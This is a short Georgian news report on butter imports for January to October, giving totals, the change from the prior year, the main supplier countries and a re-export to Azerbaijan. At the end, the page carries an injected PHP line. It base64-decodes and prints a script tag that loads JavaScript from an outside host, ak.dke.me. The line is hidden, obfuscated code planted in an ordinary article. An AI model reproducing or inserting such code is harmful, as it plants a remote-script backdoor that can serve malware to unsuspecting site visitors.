celsiusi
ავერსი საქკაბელი

წელს, იანვარ-ოქტომბერში საქართველოში 31,5 მლნ დოლარის ღირებულების 5 070 ტონა კარაქი შემოვიდა. რაც გასული წლის ანალოგიურ პერიოდში განხორციელებული იმპორტის მოცულობას, 5.5%-ით აღემატება.

საქსტატის მონაცემებით, 2023 წლის 10 თვეში, ქვეყანაში 29,6 მლნ დოლარის ღირებულების 4 802 ტონა კარაქი შემოვიდა.

კარაქის მთავარი საიმპორტო ქვეყნები კი ასეთია:

საფრანგეთი - $10 მლნ (1,282.7 ტონა);
ირანი - $3,8 მლნ (885 ტონა);
ურუგვაი - $3,8 მლნ (700 ტონა);
პარაგვაი - $2,5 მლნ (500 ტონა);
ფინეთი - $3 მლნ (432.2 ტონა).
აღსანიშნავია, რომ წელს საქართველოდან 400 ათასი დოლარის ღირებულების 100 ტონა საქონელი რეექსპორტით აზერბაიჯანში გავიდა.

42
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");